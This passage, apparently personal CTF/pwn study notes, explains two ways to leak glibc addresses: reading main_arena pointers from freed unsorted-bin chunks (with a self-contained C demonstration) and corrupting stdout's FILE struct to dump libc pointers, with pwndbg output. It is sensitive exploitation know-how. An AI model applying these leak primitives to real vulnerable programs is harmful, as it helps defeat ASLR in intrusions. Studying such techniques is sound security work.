Leaking libc
Key point: the low 12 bits (last three hex digits) of every glibc address are constant across runs, because ASLR shifts the library by whole pages; only the higher digits change.
main_arena leak
main_arena lives in the .data section of libc.so.6, so its offset from the libc base is fixed for a given build, and a leaked main_arena pointer minus that offset gives the libc base. main_arena is a static symbol (not exported), so to find the offset open libc.so.6 in IDA and look at the exported malloc_trim(), which takes the address of main_arena directly.
-
The unsorted bin is a doubly linked list whose head is a fake chunk inside main_arena. The most recently freed chunk's bk and the oldest chunk's fd therefore both point to main_arena+48 (32-bit) or main_arena+88 (64-bit); a chunk that is alone in the bin has both fd and bk pointing there. The +88 figure holds up to glibc 2.25; glibc 2.26 added the have_fastchunks field to malloc_state, which moves the 64-bit value to main_arena+96.
-
So it is enough to free a chunk into the unsorted bin (size above the fastbin range, and above the tcache range on glibc 2.26+, and not bordering the top chunk so it is not merged into it) and then read back its fd/bk, e.g. through a dangling pointer or an overlapping chunk, to leak a libc address.
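As an added example (not part of the original note), the following C program performs the main_arena leak against its own process: it frees two chunks into the unsorted bin, reads their fd/bk the way a use-after-free would, and checks via /proc/self/maps that the pointer lies inside libc, printing its offset from the libc base, which should match the main_arena+88 (glibc up to 2.25) or main_arena+96 (glibc 2.26 and later) figure taken from IDA. It assumes x86-64 Linux with a dynamically linked glibc; the 0x500 request size and the small guard allocations are choices made here to keep the chunks out of tcache/fastbins and away from the top chunk.

```c
/* Added example, not from the original note: leak the unsorted bin head
 * (a pointer into main_arena) from freed chunks and confirm it is in libc.
 * Assumes x86-64 Linux, dynamically linked glibc. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct unsorted_leak {
    uintptr_t fd_of_oldest;   /* fd of the first chunk freed  -> unsorted bin head */
    uintptr_t bk_of_newest;   /* bk of the last chunk freed   -> unsorted bin head */
    int chunks_link;          /* oldest->bk / newest->fd point at each other's chunk header */
};

struct unsorted_leak unsorted_bin_leak(void) {
    /* 0x500 bytes -> 0x510 chunk: above the fastbin range and above the tcache
     * maximum (0x410), so free() puts it in the unsorted bin. */
    char *a = malloc(0x500);
    char *guard_a = malloc(0x20);   /* in-use neighbour so a is not merged into top */
    char *b = malloc(0x500);
    char *guard_b = malloc(0x20);   /* same for b */

    free(a);   /* list: head <-> a <-> head         a->fd = a->bk = head */
    free(b);   /* list: head <-> b <-> a <-> head   b->bk = head, a->fd = head */

    /* Dangling-pointer read of the freed chunks' user data: fd at +0, bk at +8. */
    uintptr_t *ap = (uintptr_t *)a, *bp = (uintptr_t *)b;
    struct unsorted_leak r;
    r.fd_of_oldest = ap[0];
    r.bk_of_newest = bp[1];
    r.chunks_link = ap[1] == (uintptr_t)b - 0x10 && bp[0] == (uintptr_t)a - 0x10;
    (void)guard_a; (void)guard_b;   /* deliberately kept allocated */
    return r;
}

/* Look p up in /proc/self/maps (what pwndbg's vmmap shows): returns 1 if p is inside
 * a libc mapping and stores p's offset from libc's lowest mapped address, which is
 * the number to compare with the main_arena offset found in IDA. */
int in_libc(uintptr_t p, uintptr_t *offset_from_base) {
    FILE *maps = fopen("/proc/self/maps", "r");
    if (!maps) return 0;
    char line[512];
    uintptr_t base = 0;
    int hit = 0;
    while (fgets(line, sizeof line, maps)) {
        unsigned long lo, hi;
        if (sscanf(line, "%lx-%lx", &lo, &hi) != 2) continue;
        if (!strstr(line, "libc.so") && !strstr(line, "libc-2."))   /* libc.so.6 or libc-2.xx.so */
            continue;
        if (base == 0 || lo < base) base = lo;
        if (p >= lo && p < hi) hit = 1;
    }
    fclose(maps);
    if (hit && offset_from_base) *offset_from_base = p - base;
    return hit;
}

int main(void) {
    struct unsorted_leak r = unsorted_bin_leak();
    uintptr_t off = 0;
    int ok = in_libc(r.fd_of_oldest, &off);
    printf("leaked %#lx (low 12 bits %#lx), %s, offset from libc base %#lx\n",
           (unsigned long)r.fd_of_oldest, (unsigned long)(r.fd_of_oldest & 0xfff),
           ok ? "inside libc" : "NOT in libc", (unsigned long)off);
    return ok && r.fd_of_oldest == r.bk_of_newest && r.chunks_link ? 0 : 1;
}
```

Build with `gcc -o unsorted_leak unsorted_leak.c` and run it a few times: the high digits of the leaked value change with ASLR, the low three hex digits and the printed offset do not, which is exactly what makes the leak usable.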
_IO_FILE leak
References:
https://wiki.x10sec.org/pwn/linux/io_file/exploit-in-libc2.24-zh/
https://b0ldfrev.gitbook.io/note/pwn/iofile-li-yong-si-lu-zong-jie
-
Prerequisite: control of a pointer so that it can be made to point into libc's memory (here, at _IO_2_1_stdout_).
-
The libc global _IO_list_all heads a linked list (through each FILE's _chain field) of open FILE structs; initially it holds three:
_IO_2_1_stderr_
_IO_2_1_stdout_
_IO_2_1_stdin_
-
The low 12 bits of _IO_2_1_stdout_ are 0x620 in this libc build (0x7ffff7dd2620 in the pwndbg output below); the next hex digit is randomized and has to be guessed. Write 0x2620 (a 2-byte partial overwrite) and keep retrying: with a 1-in-16 chance per run, some run will land on 0x2620.
-
Modify the FILE struct as below. On output, glibc writes out the bytes between _IO_write_base and _IO_write_ptr. With stdout unbuffered both point at _shortbuf (_IO_2_1_stdout_+131, see the pwndbg output below), so nothing is pending; overwriting the low byte of _IO_write_base with 0x20 moves it back to the start of _IO_2_1_stdout_, and the next puts/printf dumps the struct itself ahead of the normal output. The dump contains the struct's own pointers: the _IO_write_base field (offset 0x20) holds the address of _IO_2_1_stdout_ in libc.
_flags = 0xfbad1800  (_IO_MAGIC | _IO_IS_APPENDING | _IO_CURRENTLY_PUTTING: output is pending, flush it without seeking first)
_IO_read_ptr = 0
_IO_read_end = 0
_IO_read_base = 0
_IO_write_base = (_IO_write_base & 0xffffffffffffff00) | 0x20
-
After the next puts or printf the received data looks like this and contains libc addresses:
offset 0x00: _flags (0xfbad1800, little-endian)
offset 0x20: _IO_write_base -> _IO_2_1_stdout_ (0x7f6e702b2620); offset 0x28 onwards: _IO_write_ptr and the following pointers -> _IO_2_1_stdout_+131 (0x7f6e702b26a3)
[DEBUG] Received 0x127 bytes:
    00000000  00 18 ad fb 00 00 00 00  00 00 00 00 00 00 00 00  │····│····│····│····│
    00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  │····│····│····│····│
    00000020  20 26 2b 70 6e 7f 00 00  a3 26 2b 70 6e 7f 00 00  │ &+p│n···│·&+p│n···│
    00000030  a3 26 2b 70 6e 7f 00 00  a3 26 2b 70 6e 7f 00 00
By default _IO_write_base points to _IO_2_1_stdout_+131 (the struct's own _shortbuf, 0x...26a3); changing its low byte from 0xa3 to 0x20 gives 0x...2620, the address of _IO_2_1_stdout_ in libc. In the pwndbg output the original _flags value -72537977 is 0xfbad2887.
pwndbg> p _IO_2_1_stdout_
$1 = {
  file = {
    _flags = -72537977,
    _IO_read_ptr = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n",
    _IO_read_end = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n",
    _IO_read_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n",
    _IO_write_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n",
    _IO_write_ptr = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n",
    _IO_write_end = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n",
    _IO_buf_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n",
    _IO_buf_end = 0x7ffff7dd26a4 <_IO_2_1_stdout_+132> "",
    _IO_save_base = 0x0,
    _IO_backup_base = 0x0,
    _IO_save_end = 0x0,
    _markers = 0x0,
    _chain = 0x7ffff7dd18e0 <_IO_2_1_stdin_>,
    _fileno = 1,
    _flags2 = 0,
    _old_offset = -